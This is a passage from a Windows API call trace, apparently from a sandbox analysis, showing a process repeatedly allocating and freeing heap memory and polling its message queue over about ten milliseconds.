lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0181.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0181.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0181.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0181.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0181.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0181.763] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0181.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0181.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0181.763] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0181.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0181.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0181.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0181.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0181.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0181.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0181.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0181.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0181.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0181.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0181.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0181.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0181.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0181.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0181.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0181.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0181.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0181.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0181.766] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0181.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0181.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0181.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0181.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0181.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0181.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.767] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.768] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0181.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.770] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0181.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0181.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0181.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0181.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0181.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0181.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0181.772] HeapFree (in: 